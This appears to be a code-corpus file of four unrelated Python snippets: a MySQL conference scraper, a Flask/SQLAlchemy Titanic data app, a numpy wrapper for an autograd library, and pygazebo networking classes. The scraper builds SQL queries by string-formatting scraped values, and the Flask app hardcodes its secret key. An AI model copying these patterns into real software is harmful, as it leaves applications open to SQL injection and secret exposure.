organizer_id = organizer_id[0]
insert_sql = """insert into conferences(title, url, start_date, end_date, area, specialties, organizer, organizer_id) VALUES
("%s", "%s", "%s", "%s", "%s", "%s", "%s", %s)""" % (
meeting.title, meeting.url, meeting.start_date, meeting.end_date, meeting.area, meeting.specialties, meeting.organizer,
organizer_id)
self.cursor.execute(insert_sql)
self.mysql_cli.commit()
except Exception as e:
self.mysql_cli.rollback()
logger.error(e)
logger.error("保存会议失败")
try:
sql = """select id from conferences where url = '%s'""" % meeting.url
self.cursor.execute(sql)
conference_table_id = self.cursor.fetchone()
print conference_table_id
conference_table_id = conference_table_id[0]
except Exception as e:
logger.error(e)
logger.error("查询会议失败")
return
return conference_table_id
def save_relationship(self, speaker_url, meetingid):
"""保存人物和会议的多对多关系"""
# 查询人物的id
print "save_relationship"
sql = """select id from speakers where url = '%s'""" % speaker_url
try:
self.cursor.execute(sql)
speaker_table_id = self.cursor.fetchone()
if not speaker_table_id:
return
speaker_table_id = speaker_table_id[0]
# Insert the relationship row
sql1 = """insert into conferences_speakers (conference_id, speakers_id) VALUES (%d, %d)""" %(meetingid, speaker_table_id)
self.cursor.execute(sql1)
self.mysql_cli.commit()
except Exception as e:
self.mysql_cli.rollback()
print "查询人物, 写入人-会关系失败"
logger.error(e)
logger.error("查询人物, 写入人-会关系失败")
def __del__(self):
self.cursor.close()
self.mysql_cli.close()
def main():
name_list = ["thread_1", "thread_2", "thread_3"]
thread_list = []
for i in range(3):
meetingspider = GainDetailInfoThread(name_list[i])
thread_list.append(meetingspider)
for thread in thread_list:
thread.setDaemon(True)
thread.start()
for thread in thread_list:
thread.join()
if __name__ == '__main__':
# meeting = GainDetailInfoThread()
# meeting.run()
main()
| StarcoderdataPython |
1740809 | <reponame>andrecianflone/wolf
__author__ = 'max'
from wolf.modules.dequantization.dequantizer import DeQuantizer, UniformDeQuantizer, FlowDeQuantizer
| StarcoderdataPython |
3287673 | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
# Imports
from flask import Flask # manage the app
from sqlalchemy import create_engine # used to detect if table exists
from flask_sqlalchemy import SQLAlchemy # manage the database
import click # used to load the data
import pandas as pd # process pandas
# Invoke Flask magic
app = Flask(__name__)
# App Configuration
app.config['SECRET_KEY'] = 'S_U_perS3crEt_KEY#9999'
# SQLAlchemy Configuration
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# DB Object = SQLAlchemy interface
db = SQLAlchemy (app)
# Define the storage
class Data(db.Model):
passengerId = db.Column(db.Integer, primary_key=True )
name = db.Column(db.String(250), nullable=False )
survived = db.Column(db.Integer, nullable=False )
sex = db.Column(db.String(10 ), default=None )
age = db.Column(db.Integer, default=-1 )
fare = db.Column(db.Float, default=-1 )
# Table constructor - called by the custom command 'load_data'
def __init__(self, passengerId, name, survived, sex, age, fare):
self.passengerId = passengerId
self.name = name
self.survived = survived
self.sex = sex
self.age = age
self.fare = fare
# The string representation of the class
def __repr__(self):
return str(self.passengerId) + ' - ' + str(self.name)
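# Illustrative row creation (not part of the original app); argument order matches the
# constructor (passengerId, name, survived, sex, age, fare):
#   row = Data(1, "Braund, Mr. Owen Harris", 0, "male", 22, 7.25)
#   db.session.add(row); db.session.commit()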
# Define the custom command
@app.cli.command("load-data")
@click.argument("fname")
def load_data(fname):
''' Load data from a CSV file '''
print ('*** Load from file: ' + fname)
# Build the Dataframe from pandas
df = pd.read_csv( fname )
# Iterate and load the data
for row in df.itertuples(index=False):
print ( '************************************************' )
v_passengerId = row[0]
v_survived = row[1]
v_name = row[3]
v_sex = row[4]
v_age = row[5]
v_fare = row[9]
print ( 'PassengerId = ' + str( v_passengerId ) )
print ( 'Survived = ' + str( v_survived ) )
print ( 'Name = ' + str( v_name ) )
print ( 'Sex = ' + str( v_sex ) )
print ( 'Age = ' + str( v_age ) )
print ( 'Fare = ' + str( v_fare ) )
# def __init__(self, id, passengerId, name, survived, sex, age, fare):
obj = Data(v_passengerId, v_name, v_survived, v_sex, v_age, v_fare)
db.session.add( obj )
# All good, commit changes
db.session.commit( )
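# Illustrative invocation of the custom CLI command (assumes FLASK_APP points at this
# module and that a Titanic-style CSV exists at the given path):
#   $ FLASK_APP=app.py flask load-data titanic.csv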
# Default Route
@app.route('/')
def hello_world():
retVal = 'Hello, the database has ('+str( len(Data.query.all()) )+') rows'
retVal += '<br /> See loaded <a href="/data">data</a>.'
return retVal
# Data Route - Shows the loaded information
@app.route('/data')
def data():
retVal = 'Rows = ' + str( len(Data.query.all()) ) + '<br />'
for row in Data.query.all():
retVal += '<br />' + str( row.__repr__() )
return retVal
| StarcoderdataPython |
3228374 | import flamethrower.autograd.call as call
import numpy as _np
notrace_functions = [
_np.ndim, _np.shape, _np.iscomplexobj, _np.result_type
]
def wrap_namespace(old, new):
unchanged_types = {float, int, type(None), type}
for name, obj in old.items():
if obj in notrace_functions:
new[name] = call.Primitive2(obj)
elif callable(obj) and type(obj) is not type:
new[name] = call.Primitive2(obj)
elif type(obj) in unchanged_types:
new[name] = obj
# Wrap numpy
wrap_namespace(_np.__dict__, globals())
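# Illustrative effect (assumption about Primitive2, defined elsewhere in this package):
# after wrapping, callables such as numpy's `tanh` are exposed here as call.Primitive2
# objects, while plain constants like `pi` are copied through unchanged.
#   # type(globals()['tanh'])  -> call.Primitive2
#   # globals()['pi']          -> 3.141592653589793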
| StarcoderdataPython |
11295 | <reponame>robobe/pygazebo
import concurrent
import time
import math
import sys
import asyncio
import logging
from . import msg
from .parse_error import ParseError
from . import DEBUG_LEVEL
logger = logging.getLogger(__name__)
logger.setLevel(DEBUG_LEVEL)
async def _wait_closed(stream):
assert(sys.version_info.major >= 3)
if sys.version_info.minor >= 7:
await stream.wait_closed()
class DisconnectError(Exception):
def __init__(self,
connection_name: str,
server_addr: tuple,
local_addr: tuple,
discarded_bytes: int):
"""
:param connection_name: Name of the connection
:param server_addr: remote address of the connection (address, port)
:type server_addr: tuple[str, int]
:param local_addr: local address of the connection (address, port)
:type local_addr: tuple[str, int]
:param discarded_bytes: number of bytes not read from the socket
"""
self._connection_name = connection_name
self._server_addr = server_addr
self._local_addr = local_addr
self._discarded_bytes = discarded_bytes
@staticmethod
def _to_addr(addr):
return f'{addr[0]}:{addr[1]}'
def __str__(self):
return f'DisconnectError' \
f'({self._connection_name}: {self._to_addr(self._local_addr)} -> {self._to_addr(self._server_addr)})' + \
(f' bytes not collected: {self._discarded_bytes}' if self._discarded_bytes is not None and self._discarded_bytes > 0 else '')
class Server(object):
def __init__(self, name: str):
self._name = name
self._server = None
self._listen_host = None
self._listen_port = None
self._running_server = None
async def serve(self, handler):
"""
Start TCP server
:param handler: called for each new connection. async function
:type handler: async lambda reader, writer -> None
:return:
"""
self._server = await asyncio.start_server(handler, host='0.0.0.0')
self._listen_host, self._listen_port = self._server.sockets[0].getsockname()
logger.info(f"Listening on {self._listen_port}:{self._listen_port}")
self._running_server = asyncio.ensure_future(self._server_loop())
return self._listen_host, self._listen_port
async def _server_loop(self):
if sys.version_info.minor >= 7:
async with self._server:
await self._server.serve_forever()
else:
await self._server.wait_closed()
async def close(self):
self._server.close()
await _wait_closed(self._server)
try:
await self._running_server
except concurrent.futures.CancelledError:
pass
@property
def listen_host(self):
assert self._server is not None
return self._listen_host
@property
def listen_port(self):
assert self._server is not None
return self._listen_port
class Connection(object):
"""Manages a Gazebo protocol connection.
"""
def __init__(self, name):
self.name = name
self._address = None
self._port = None
self._reader = None
self._writer = None
self._closed = True
async def connect(self, address, port):
logger.debug('Connection.connect')
self._address = address
self._port = port
reader, writer = await asyncio.open_connection(address, port)
self.accept_connection(reader, writer)
def accept_connection(self, reader, writer):
self._reader = reader
self._writer = writer
self._closed = False
async def close(self):
if self._closed:
logger.debug("Trying to close an already closed connection")
return
self._closed = True
self._writer.write_eof()
await self._writer.drain()
self._writer.close()
await _wait_closed(self._writer)
async def write_packet(self, name: str, message, timeout):
assert not self._closed
packet = msg.packet_pb2.Packet()
cur_time = time.time()
packet.stamp.sec = int(cur_time)
packet.stamp.nsec = int(math.fmod(cur_time, 1) * 1e9)
packet.type = name.encode()
packet.serialized_data = message.SerializeToString()
await self._write(packet.SerializeToString(), timeout)
async def write(self, message, timeout=None):
data = message.SerializeToString()
await self._write(data, timeout)
async def _write(self, data, timeout):
header = ('%08X' % len(data)).encode()
self._writer.write(header + data)
await asyncio.wait_for(self._writer.drain(), timeout=timeout)
async def read_raw(self):
"""
Read incoming packet without parsing it
:return: byte array of the packet
"""
header = None
try:
assert not self._closed
header = await self._reader.readexactly(8)
if len(header) < 8:
raise ParseError('malformed header: ' + str(header))
try:
size = int(header, 16)
except ValueError:
raise ParseError('invalid header: ' + str(header))
else:
data = await self._reader.readexactly(size)
return data
except (ConnectionResetError, asyncio.streams.IncompleteReadError) as e:
if self._closed:
return None
else:
local_addr, local_port = self._writer.transport.get_extra_info('sockname')
discarded_bytes = len(e.partial) if isinstance(e, asyncio.streams.IncompleteReadError) else None
if header is not None:
discarded_bytes += 8
raise DisconnectError(
connection_name=self.name,
server_addr=(self._address, self._port),
local_addr=(local_port, local_addr),
discarded_bytes=discarded_bytes
) from e
async def read_packet(self):
data = await self.read_raw()
if not self._closed:
packet = msg.packet_pb2.Packet.FromString(data)
return packet
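# Illustrative usage (assumptions: a running asyncio event loop and a Gazebo master
# reachable on localhost:11345, the default gzserver master port):
#   async def main():
#       conn = Connection("example-client")
#       await conn.connect("localhost", 11345)
#       packet = await conn.read_packet()
#       await conn.close()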
| StarcoderdataPython |